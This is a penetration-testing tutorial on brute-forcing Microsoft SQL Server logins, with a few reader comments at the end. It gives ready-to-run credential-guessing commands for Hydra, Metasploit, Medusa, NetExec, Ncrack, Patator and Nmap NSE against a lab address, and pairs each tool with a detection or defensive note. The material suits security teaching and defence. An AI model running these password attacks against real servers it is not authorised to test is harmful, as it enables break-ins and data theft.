Password Cracking:MS-SQL
MSSQL brute-force attacks are a frequent initial access tactic during internal assessments and red team ops. Microsoft SQL Server—commonly exposed on TCP port 1433—often holds sensitive data and privileges, making it a high value target. When SQL authentication is enabled, attackers may exploit weak credentials using tools like Hydra, Metasploit, or Nmap NSE.
This guide explores advanced techniques for exploiting MSSQL authentication mechanisms across diverse network environments.
MITRE ATT&CK Techniques:
- T1110.001 – Brute Force: Password Guessing
- T1046 – Network Service Scanning
- T1078 – Valid Accounts
Table of Contents
Introduction
Enumeration
- Scan for Open MSSQL Port with Nmap
Brute-Force Techniques
- Hydra
- Metasploit
- Medusa
- NetExec (nxc)
- Ncrack
- Patator
- Nmap NSE Script (ms-sql-brute.nse)
Introduction
Microsoft SQL Server (MSSQL) is a relational database platform commonly deployed in enterprise networks to manage and store structured data. It communicates over TCP port 1433 and supports both SQL and Windows authentication mechanisms. While Windows authentication offers better security via Active Directory integration, SQL authentication remains widely used—often with weak or default credentials.
MSSQL instances, especially in internal or hybrid environments, can become high value targets due to their access to sensitive data and administrative privileges. Improperly secured deployments may allow attackers to exploit exposed services through brute force attacks, making MSSQL a critical component in penetration testing and red teaming assessments.
Enumeration
Nmap Scan
Firstly, to begin the enumeration process, we perform an Nmap scan against the target IP address to identify an open MSSQL service and gather information about the server version. This helps confirm the presence of a SQL Server instance and assess potential vulnerabilities based on version or configuration.
nmap -p 1433 -sV 192.168.1.80
Explanation:
- -p 1433: Scans for the default Microsoft SQL Server on port 1433.
- -sV: Enables version detection to identify the specific MSSQL version running on the target host.
Once Nmap confirms that port 1433 is open and an MSSQL service is active, this information can be used to plan targeted authentication attacks or service specific exploitation in the next phase.
Defensive Strategy:
Use IDS/IPS (e.g., Zeek, Suricata) to detect scan behavior. Limit SQL access to known IPs using firewall/NSG policies.
Brute-Force Techniques
Tools Quick Reference
Hydra
Hydra is particularly effective in environments where SQL authentication is enabled and weak or default credentials are in use. The success of such attacks largely depends on the quality of the wordlists used, such as user.txt for usernames and pass.txt for passwords. The success of such attacks largely depends on the quality of the wordlists used, such as user.txt for usernames and pass.txt for passwords.
Step To Reproduce
To perform a brute force attack against an MSSQL service, use the following command:
hydra -L user.txt -P pass.txt 192.168.1.80 mssql
Explanation:
- -L user.txt: Specifies the path to the username list.
- -P pass.txt: Specifies the path to the password list.
- 192.168.1.80: Target IP address.
- mssql: Protocol to attack.
Hydra will systematically test each username-password pair against the MSSQL service on the specified host. If valid credentials are found, Hydra will clearly report the success.
Detection Strategy:
Enable SQL Server Audit or Extended Events. Detect failed logins (Event ID 18456) and alert via SIEM. Apply IP-based throttling using Fail2Ban or firewall rules.
Metasploit
Metasploit includes auxiliary module that enables automated brute force attempts with detailed logging, modular options, and integration into post exploitation workflows. It’s particularly effective during red team simulations where SQL Server access is needed for pivoting, lateral movement, or persistence. The framework’s output is structured, which makes it useful for integration with reporting tools or pipelines.
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
Step To Reproduce
msf6 > use auxiliary/scanner/mssql/mssql_login set rhosts 192.168.1.80 set user_file user.txt set pass_file pass.txt set verbose false run
Explanation:
- use auxiliary/scanner/mssql/mssql_login: Loads the MSSQL login scanner module used for brute force authentication.
- set rhosts 192.168.1.80: Specifies the IP address of the target MSSQL server.
- set user_file user.txt: Defines the file containing potential usernames.
- set pass_file pass.txt: Defines the file containing passwords to pair with the usernames.
- set verbose false: Disables verbose output to reduce console noise during the brute force process.
- run: Executes the module and begins testing all username password combinations against the MSSQL service.
Defensive Control:
Monitor audit logs for repeated failures. And additionally block sources using host firewall or NSG. Detect scan to login sequences.
Medusa
Medusa is designed to support large scale login attempts by testing multiple username password combinations simultaneously across multiple hosts or services. It is particularly effective in internal environments where SQL authentication is enabled.
In this case, we can efficiently attempt login combinations against MSSQL targets using prepared dictionaries such as user.txt and pass.txt.
Step To Reproduce
Below we have successfully grabbed credentials using following command:
medusa -h 192.168.1.80 -U user.txt -P pass.txt -M mssql | grep "ACCOUNT FOUND"
Explanation:
- medusa: Invokes the Medusa brute force tool.
- -h 192.169.1.80: Specifies the IP address of the target machine.
- -U: Points to a file containing a list of usernames to try.
- -P: Points to a file containing a list of passwords.
- -M mssql: Indicates that the MSSQL module should be used for this attack.
- | grep “ACCOUNT FOUND”: Filters the command output to display only successful login attempts, making it easier to identify valid credentials.
Defensive Strategy:
Detect bulk login failures with SIEM correlation. Enable lockout policies and rate limits per IP.
Netexec (aka nxc)
Among its many capabilities, NetExec can, for example, perform brute force attacks on Microsoft SQL Server by using specified username and password lists. It is particularly useful for mass validation of credential pairs obtained during earlier recon or OSINT phases, especially in internal environments where SQL authentication is enabled and network segmentation is limited.
Step To Reproduce
To initiate a brute force attack against an MSSQL service using NetExec, run the following command:
nxc mssql 192.168.1.80 -u user.txt -p pass.txt --local-auth | grep [+]
Explanation:
- nxc: Invokes the NetExec burte force tool
- mssql: Specifies the protocol to target for MSSQL.
- 192.168.1.80: The IP address of the target host.
- -u user.txt: Path to the file containing a list of usernames.
- -p pass.txt: Path to the file containing a list of passwords.
- | grep [+]: Filters the command output to display only successful login attempts, making it easier to identify valid credentials.
Defensive Statergy:
Monitor failed and successful logins. Limit SQL access by IP. Enforce Windows Authentication where possible.
Ncrack
Ncrack supports modular configuration and multithreaded execution, allowing for efficient brute force attempts while maintaining connection stability and performance.
In MSSQL-focused operations, Ncrack is ideal for quickly testing username and password pairs against exposed database services, particularly in misconfigured or externally accessible SQL environments.
Step To Reproduce
ncrack -U user.txt -P pass.txt 192.168.1.80 -p 1433
Explanation:
- ncrack: Launches the Ncrack password-cracking tool.
- -U user.txt: Indicates the file containing a list of potential usernames.
- -P pass.txt: Indicates the file containing a list of potential passwords.
- -p 1433: Specifies the MSSQL default port for authentication attempts.
Defensive Strategy:
Rate-limit MSSQL connections per IP. Additionally, use NIDS to alert on rapid authentication attempts. Finally, restrict internet-facing SQL endpoints to minimize exposure.
Patator
Patator allows fine-grained control over brute force behavior—such as custom delays, retry logic, and error handling—making it especially useful in stealthy or evasion-focused engagements.
It can be used to perform MSSQL brute force attacks by iterating through supplied username and password lists which in this case will be user.txt and pass.txt.
patator mssql_login host=192.168.1.80 user=FILE0 0=user.txt password=FILE1 1=pass.txt
Explanation:
- patator: Launches the Patator brute force tool.
- mssql_login: Specifies the module for Microsoft SQL Server login attempts.
- host=192.168.1.80: Indicates the target machine’s IP address.
- user=FILE0 0=user.txt: Assigns FILE0 as a placeholder for usernames, pulling values from user.txt.
- password=FILE1 1=pass.txt: Assigns FILE1 as a placeholder for passwords, pulling values from pass.txt.
Note: You can add | grep ‘200 OK’ or -x ignore:code=530 for success filtering or to skip known failed responses based on Patator’s output codes.
Defensive Suggestion:
Detect retry patterns via audit logs. Apply per-IP throttling. Additionally, Use IPS to block based on behavioural heuristics.
Nmap NSE Script
The ms-sql-brute.nse script allows testers to perform credential based login attempts against Microsoft SQL Server using customized username and password lists.
Step To Reproduce
Firstly, to perform a brute force attack against an MSSQL service using Nmap, run the following command:
nmap -p1433 --script ms-sql-brute.nse --script-args userdb=user.txt,passdb=pass.txt 192.168.1.80
Explanation:
- –p1433: Scans the default port used by MSSQL.
- –script ms-sql-brute.nse: Specifies the use of the MSSQL brute force NSE script.
- –script-args userdb=user.txt,passdb=pass.txt: Provides the script with your custom username and password lists.
This method is especially useful during early stage reconnaissance to identify weak or default MSSQL credentials on a target system.
Defensive Strategy:
Detect sequential login failures tied to Nmap scans. Block offending IPs and alert via SIEM.
MSSQL Brute-Force – Offense, Defence & MITRE Mapping
Defence-in-Depth Summary
To learn more about Password Cracking. Follow this Link.
Author: Kinjal Patel is seasoned penetration tester and technical content writer. Contact at LinkedIn
kali sparta
Thank u so much 😀
hi
in hydra
if sqlserver instance name is “ip\servername”
how set it in hydra command?
I was only using Metasploit but after reading I’ll test xhydra and medusa